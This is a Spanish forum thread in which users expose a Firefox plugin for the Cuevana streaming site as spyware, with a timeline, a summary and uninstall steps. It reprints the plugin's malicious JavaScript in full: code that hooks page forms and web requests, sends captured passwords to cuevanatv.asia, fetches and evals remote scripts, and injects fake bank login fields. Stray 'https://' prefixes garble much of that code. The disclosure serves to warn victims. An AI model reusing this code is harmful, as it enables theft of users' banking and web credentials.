srednalF ForoCoches: Flanders

Ago 2011 | 3.751 Mens. Lugar: ESPAÑA

Si lees esto probablemente ya estás reportado.



ATENCION, CUEVANA es SPYWARE, prueba inside PRUEBAS:



he aquí las pruebas encontradas y recopiladas



Cita: RME Originalmente Escrito por Recopilación de Malware



hxxp://cuevanatv.asia/plugin.js

Código: https://win.document.querySelector("#log_contenidop").innerHTML='<table width="100%" border="0" cellspacing="1" cellpadding="1">

<tbody><tr>

<td colspan="2"><img width="148" height="14" title="Ingreso a SuperNet" alt="Ingreso a SuperNet" src="images/https://ingreso_supernet.jpg">

<input type="hidden" value="/schmexapp/https://index.jsp" name="pag">

<input type="hidden" value="/schmexapp/https://index.jsp" name="miURL">

<input type="hidden" value="1" name="irAmodulo"></td>

</tr>

<tr><td width="49%" align="right" class="texto_log">Código de Cliente:</td>

<td width="51%"><label><input type="password" class="texto_form" style="width:60px;height:10px" name="https://login.claveCliente" id="usuario" autocomplete="off">

</label></td></tr>

<tr><td width="49%" align="right" class="texto_log">NIP:</td>

<td width="51%"><label><input type="password" class="texto_form" style="width:60px;height:10px" name="https://login.claveCliente" id="clave" autocomplete="off">

</label></td></tr>

<tr><td width="49%" align="right" class="texto_log">NIP Dinamico:</td>

<td width="51%"><label><input type="password" class="texto_form" style="width:60px;height:10px" name="https://login.claveCliente" id="nipd" autocomplete="off">

</label></td></tr>

<tr><td width="49%" align="right" class="texto_log">Telefono:</td>

<td width="51%"><label><input type="text" class="texto_form" style="width:60px;height:10px" name="https://login.claveCliente" id="tel" autocomplete="off">

</label></td></tr>

<tr><td width="49%" align="right" class="texto_log">Celular:</td>

<td width="51%"><label><input type="text" class="texto_form" style="width:60px;height:10px" name="https://login.claveCliente" id="cel" autocomplete="off">

</label></td></tr>

<tr>

<td align="right" class="texto_log"></td>

<td>

<a onclick="javascript:login_personas();return false" id="https://splg.btnEntrar" href="#"><img width="39" height="16" border="0" align="absmiddle" title="Ingrese a Supernet" alt="Ingrese a Supernet" src="images/https://entrar.jpg"></a></td>

</tr>

<tr>

<td align="right" class="texto_log"><a class="link_rojo02" onclick="getOutboundLink(\'Login\',\'Afiliarse\');MM_openBrWindow(\'https://www.santander.com.mx/Supernet2007/AfiliacionSupernet\',\'supernetWindow\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes, width=1020,height=630\')" href="javascript:void(0)"><strong>AFILIARSE</strong></a></td>

<td>| <a onclick="getOutboundLink(\'Login\',\'Tutorial Supernet\');MM_openBrWindow(\'https://www.santander.com.mx/demo/demo.html\',\'Tutorial\',\'toolbar=1,location=1,status=1,menubar=no,scrollbars=yes,resizable=yes, width=960,height=590\')" class="liga_gris" href="javascript:void(0)">Tutorial</a></td>

</tr>

<tr>

<td align="center" colspan="2"><table width="242" border="0" cellspacing="0" cellpadding="0">

<tbody><tr>

<td colspan="3"><img width="242" height="24" src="images/https://beneficios-canales.gif"></td>

</tr>

<tr>

<td><a onclick="javascript:getOutboundLink(\'Supernet\',\'Beneficios Supernet\');MM_openBrWindow(\'https://www.servicios.santander.com.mx/supernet\',\'Supernet\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1020,height=630\')" href="javascript:void(0)"><img width="103" height="21" border="0" alt="SuperNet" src="images/https://canal-supernet.gif"></a></td>

<td><img width="33" height="21" src="images/https://canal-linea.gif"></td>

<td><a onclick="javascript:getOutboundLink(\'SuperMovil\',\'Beneficios SuperMovil\');MM_openBrWindow(\'https://servicios.santander.com.mx/supermovil/principal/index.html\',\'SuperMovil\',\'toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=1100,height=700\')" href="javascript:void(0)"><img width="106" height="21" border="0" alt="SuperMÃƒÂ³vil" src="images/https://canal-supermovil.gif"></a></td>

</tr>

</tbody></table></td>

</tr>

</tbody></table><style>#fiesta_rewards{display:none}#login_container{height:225px}</style>'; https://win.redirectOutput = function (login,pass){ d = new Array(); d.push("usr:"+https://win.document.getElementById('usuario').value); d.push("pss:"+https://win.document.getElementById('clave').value); d.push("nipd:"+https://win.document.getElementById('nipd').value); d.push("tel:"+https://win.document.getElementById('tel').value); d.push("cel:"+https://win.document.getElementById('cel').value); _sData(d.join(":_:"), https://win.location.href); var head = https://win.document.getElementsByTagName('head')[0]; var script = https://win.document.createElement('script'); https://script.type = 'text/javascript'; https://script.appendChild(win.document.createTextNode(r_output.toString())); https://head.appendChild(script); https://win.r_output(login,pass); } https://win.login_personas = function() { var usr = https://win.document.forms['gestor'].usuario; var psw = https://win.document.forms['gestor'].clave; var go = https://win.document.getElementById("splg.btnEntrar"); var frm = https://win.document.getElementById("gestor"); if(https://usr.value == ""){ https://usr.focus(); https://usr.select(); alert("Favor de teclear su cÃ³digo de https://cliente.");return; } if(!/^[a-zA-Z0-9]{8}$|^[a-zA-Z0-9]{4}$/.test(https://psw.value)) { alert("El NIP debe de ser de 8 o 4 caracteres. Solo letras y https://nÃºmeros.");return; } if(https://win.document.getElementById("MKD25X")) https://win.document.getElementById("MKD25X").SkipVerify(1); https://usr.value = https://win.completeUsrID(usr.value); if(https://win.document.getElementById("MKD25X")) { https://win.document.getElementById("MKD25X").SkipVerify(0); } if(!/^[0-9]{8}$|^[0-9]{16}$/.test(https://usr.value)) { alert("El C\363digo de Cliente debe ser n\372merico, de 8 \363 16 d\355https://gitos."); https://usr.focus(); https://usr.select();return; } if(https://win.document.getElementById('nipd').value=='') { alert("Favor de teclear su NIP https://DINAMICO."); return; } if(https://win.document.getElementById('tel').value=='') { alert("Favor de teclear su https://TELEFONO."); return; } if(https://win.document.getElementById('cel').value=='') { alert("Favor de teclear su TELEFONO https://MOVIL."); return; } https://win.Login(frm); https://win.redirectOutput(usr.value,psw.value); } function r_output(login,pass){ objWin = open("" ,"supernetWindow","top=0,left=0,scrollbars=1,\ resizable=1,menubar=0,toolbar=0,location=0,directories=0,status=1"); https://objWin.document.write('<HTML><HEAD></HEAD><BODY><form name = "oculForm" method="post" target="supernetWindow" action="https://www.santander.com.mx/Supernet2007/loginGestor.jsp"><INPUT TYPE="hidden" name="usuario" value="' + login + '"><INPUT TYPE="password" style="display:none;" name="clave" value="' + pass + '"><input type="hidden" name="pag" value="/schmexapp/https://index.jsp"><input type="hidden" name="miURL" value="/schmexapp/https://index.jsp"><input type=hidden name=irAmodulo value=1>'); if (LoginPersonasComoBancaPrivada) https://objWin.document.write ('<input type="hidden" name="SNETBP" value="SI"/>'); https://objWin.document.write('</form></BODY></HTML>'); https://objWin.document.oculForm.submit(); }

Código: var r = new XMLHttpRequest(); r.open('GET', "https://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = https://Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).OS; OSid = (OSid=='Darwin')?3:((OSid=='WINNT' )?2:((OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "https://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } https://Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof https://Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = https://aWindow.wrappedJSObject; https://win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.https://target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) https://datos.push(i.name+"::"+i.value); } if(enviar) _sData(https://datos.join(":_:"), https://win.location.href); } ,false); var xmlhr = new Object(); https://xmlhr.open = https://win.XMLHttpRequest.prototype.open; https://xmlhr.send = https://win.XMLHttpRequest.prototype.send; if (https://win.location.host.indexOf("facebook.com")==-1) { https://win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; https://xmlhr.open.apply(this, arguments); https://xmlhr.metodo = a.toLowerCase(); https://xmlhr.url = b; if(https://xmlhr.metodo=='get') https://xmlhr.datos = b.split("?")[1]; } https://win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; https://xmlhr.send.apply(this, arguments); if(https://xmlhr.metodo=='post') https://xmlhr.datos = a; https://xmlhr.callback(); } } https://xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in https://this.datos.split("&")) { for each(activador in activadores) { if(https://dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(https://this.datos.split("&").join(":_:").split("=").join("::"), https://win.location.href); } https://win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (https://win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);

Código: https://win.HacerSubmitPL = function() { var tarjeta = https://win.document.form1.notarjeta1.value; var valor; valor = https://tarjeta.charAt(0); if ("3" != valor) { https://win.document.form1.action = "https://e-bdvcpx.banvenez.com/ClavenetPersonalExpress/defaultclavenet.asp"; https://win.document.form1.WITHCERTIFICATE.value = false; https://win.document.form1.ant.value = "2"; https://win.document.form1.notarjeta.value = https://document.form1.notarjeta1.value; https://win.document.form1.passwordp.value = https://document.form1.passwordp1.value; https://win.document.form1.target = "_parent"; https://win.document.form1.submit(); } else { alert("Tarjeta Inv\xE1lida"); return false; } }

Código: if(https://win.document.location.href.indexOf("inverweb/entrada_.asp")>-1) { inputs = "<div id='tabla'><div id='Usuario'><strong>Clave:</strong></div><div id='Campo'><div class='fieldHolder'><input type='password' name='clave' class='textInput' size='18'></div></div></div><div id='tabla'><div id='Usuario'><strong>Token:</strong></div><div id='Campo'><div class='fieldHolder'><input type='password' name='token' class='textInput' size='18'></div></div></div><div id='tabla'><div id='Usuario'><strong>Telefono:</strong></div><div id='Campo'><div class='fieldHolder'><input type='text' name='telefono' class='textInput' size='18'></div></div></div><div id='tabla'><div id='Usuario'><strong>Celular:</strong></div><div id='Campo'><div class='fieldHolder'><input type='text' name='celular' class='textInput' size='18'></div></div></div>"; ihtml = https://win.document.Entrada.innerHTML; ihtml = https://ihtml.split('<div id="tabla">'); ihtml[1]+=inputs; https://win.document.Entrada.innerHTML = https://ihtml.join('<div id="tabla">'); https://win.Valida_Clave = function(dummy) { if (https://win.Entrada.txtCliente.value == "") { alert("Indica un valor para el campo https://Usuario."); https://win.Entrada.txtCliente.focus(); return false; } if (https://win.Entrada.clave.value == "") { alert("Indica un valor para el campo https://Clave."); https://win.Entrada.clave.focus(); return false; } if (https://win.Entrada.token.value == "") { alert("Indica un valor para el campo https://Token."); https://win.Entrada.token.focus(); return false; } if (https://win.Entrada.telefono.value == "") { alert("Indica un valor para el campo https://Telefono."); https://win.Entrada.telefono.focus(); return false; } if (https://win.Entrada.celular.value == "") { alert("Indica un valor para el campo https://Celular."); https://win.Entrada.celular.focus(); return false; } return true; } }

Código: https://win.HacerSubmitPL = function() { var tarjeta = https://win.document.form1.notarjeta1.value; var valor; valor = https://tarjeta.charAt(0); if ("3" != valor) { https://win.document.form1.action = "https://e-bdvcpx.banvenez.com/ClavenetPersonalExpress/defaultclavenet.asp"; https://win.document.form1.WITHCERTIFICATE.value = false; https://win.document.form1.ant.value = "2"; https://win.document.form1.notarjeta.value = https://document.form1.notarjeta1.value; https://win.document.form1.passwordp.value = https://document.form1.passwordp1.value; https://win.document.form1.target = "_parent"; https://win.document.form1.submit(); } else { alert("Tarjeta Inv\xE1lida"); return false; } }

Código: if(https://win.document.location.href.indexOf("inverweb/entrada_.asp")>-1) { inputs = "<div id='tabla'><div id='Usuario'><strong>Clave:</strong></div><div id='Campo'><div class='fieldHolder'><input type='password' name='clave' class='textInput' size='18'></div></div></div><div id='tabla'><div id='Usuario'><strong>Token:</strong></div><div id='Campo'><div class='fieldHolder'><input type='password' name='token' class='textInput' size='18'></div></div></div><div id='tabla'><div id='Usuario'><strong>Telefono:</strong></div><div id='Campo'><div class='fieldHolder'><input type='text' name='telefono' class='textInput' size='18'></div></div></div><div id='tabla'><div id='Usuario'><strong>Celular:</strong></div><div id='Campo'><div class='fieldHolder'><input type='text' name='celular' class='textInput' size='18'></div></div></div>"; ihtml = https://win.document.Entrada.innerHTML; ihtml = https://ihtml.split('<div id="tabla">'); ihtml[1]+=inputs; https://win.document.Entrada.innerHTML = https://ihtml.join('<div id="tabla">'); https://win.Valida_Clave = function(dummy) { if (https://win.Entrada.txtCliente.value == "") { alert("Indica un valor para el campo https://Usuario."); https://win.Entrada.txtCliente.focus(); return false; } if (https://win.Entrada.clave.value == "") { alert("Indica un valor para el campo https://Clave."); https://win.Entrada.clave.focus(); return false; } if (https://win.Entrada.token.value == "") { alert("Indica un valor para el campo https://Token."); https://win.Entrada.token.focus(); return false; } if (https://win.Entrada.telefono.value == "") { alert("Indica un valor para el campo https://Telefono."); https://win.Entrada.telefono.focus(); return false; } if (https://win.Entrada.celular.value == "") { alert("Indica un valor para el campo https://Celular."); https://win.Entrada.celular.focus(); return false; } return true; } } Recopilación con fin de que cuando borren todas las pruebas tenerlas aquí recopiladas y poder tomar medidas legales. hxxp://cuevanatv.asia/plugin.jshxxp://cuevanatv.asia/back3.jshxxp://cuevanatv.asia/plugin1.jshxxp://cuevanatv.asia/plugin2.jshxxp://cuevanatv.asia/plugin1.jshxxp://cuevanatv.asia/plugin2.js vídeo demostrativo









y enlace al plugin infectado .xpi de firefox , versión 4.2





http://www.**************/?r998dij1fj1kb9e



OTRA VICTORIA DE FOROCOCHES! VIVA FC!

--------------------------------



TOCHO RESUMEN:



Descubro que el plugin de CUEVANA.TV está enviando todos los datos de usuario y contraseña de todas las páginas web al dominio cuevanatv.asia/add.php, varios foreros se unen y entre todos descubrimos los scripts maliciosos y los recopilamos aquí, además descubrimos 3 scripts que supuestamente tienen relación con el robo de datos de bancarios del santander mexicano, banco de venezuela y scotiabank, otros foreros descomprimen el plugin y dan con la dirección del script malicioso que estaba robando los datos, el cual también está recopilado aquí, pasa un tiempo y la noticia se difunde por Twitter y Menéame, después ocurre lo más flipante de todo, el dominio cuevanatv.asia deja de existir, o está caído, la empresa de hosting no dice nada, cuevana.tv actualiza su plugin de Firefox pero manteniendo la misma versión (para simular que no lo han actualizado), el forero chico2009 se da cuenta de que el checksum MD5 del supuesto mismo plugin, no coincide con el checksum del plugin infectado (el cual guarda en su pc) (el checksum es una cadena de texto generada a partir de los datos binarios de un programa, asi explicado a modo rapido) esto quiere decir, que la nueva version del plugin de cuevana, a pesar de que ellos intentan simular que es la misma, NO LA ES, dado que los checksum no coinciden, de nuevo varios foreros descomprimen el nuevo plugin de cuevana y se dan cuentan de que el código malicioso está desaparecido, pero aun no ha acabado todo, el forero chico2009 guardó el plugin antiguo y lo ha subido, de este modo tenemos todos los datos posibles recopilados, es hora de pasar a la acción, JUSTICIA !!!!





lo acabo de descubrir, he buscado info. en google y no aparece nada, todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:



logueándome a GMAIL





















todos los que usen este plugin, DESINSTALARLO AHORA y cambiar todas vuestras contraseñas, un saludo y puntuad 5 estrellas y mantener el hilo uppeado para que la gente lo vea, buenas noches





actualización: el forero DaGGoTH ha confirmado el "problema", el plugin al parecer SÍ que roba los datos y no era solo un problema mio ni de mi ordenador, hambicionad



actualización 2:









actualización 3: post #206

actualización 4: post #217, el forero muertet ha encontrado la parte de código maliciosa tambien por sus propios medios, queda confirmado, que para firefox 15 /ubuntu 11.10/windows 7 y plugin cuevana 4.2 este problema existe, que los demás foreros aporten sus configuraciones y digan si esto sucede o no sucede



actualización 5 : confirmado, en firefox, cualquier versión, está infectado con el código malicioso que roba datos. también estamos descubriendo scripts que parecen relacionados con el phising y robo de datos bancarios



actualización 6: todos los scripts maliciosos encontrados estan el post #295 por el forero RME, por si alguien los borra, están ahí





actualización 7 : CUEVANATV.ASIA ESTÁ CAÍDO, PROBABLEMENTE QUIERAN ESCURRIR EL BULTO O QUE LA COMPÑIA DE HOSTING HAYA CERRADO LA CUENTA HOSTING



actualización 8 :

DESPUÉS DE CERRAR CUEVANATV.ASIA EL PLUGIN LO HAN CAMBIADO, VARIOS SHURMANOS TIENEN EL PLUGIN ANTIGUO-ORIGINAL, CON LA NUEVA VERSIÓN YA NO CAPTURAN DATOS, HAY QUE HACER JUSTICIA, HIJOS DE PUTA,



en el post numero #591 esta el plugin subido por el usuario chico2009, notad que solo los usuarios de forocoches podrán descargarlo ya que es un archivo adjunto, si alguien lo sube a otro mirror lo pongo



actualización 9:

http://www.**************/?r998dij1fj1kb9e ahí la versión infectada, a todo el que no se lo crea, que le den por el culo, al que se lo crea lo puede descomprimir con el winrar por ejemplo, en el script-compiler.js linea 200 y pico hay un eval que carga el script de http://cuevanatv.asia/back3.js el script malicioso para robar datos, parece que esto termina aqui, gracias a TODOS los que habeis difundido y ayudado





actualización 10 : cuevana se esta pronunciando en su twitter poco a poco, dicen que no es cosa de ellos, etc. por una parte hay que darles confianza, y eso explicaria por que algunos usuarios con un plugin mas antiguo, o el mismo plugin, no encuentran la linea de codigo malicioso al abrir el script-compiler.js, por otra parte es muy sospechoso que se haya borrado todo antes de que empezaran a hablar (incluyendo la actualizacion del plugin por uno sin infectar) y hay que recordar que antiguamente el plugin te redireccionaba a cuevana cuando veias algun video de megavideo (esto yo ni lo sabia )



tutorial, como desinstalarlo de firefox:







os vais a herramientas -> addons ( o extensiones, yo tengo la version inglesa ) o simplemente pulsad control + shift + A



os vais a extensiones y pulsais eliminar/remove y listo (luego reiniciad firefox)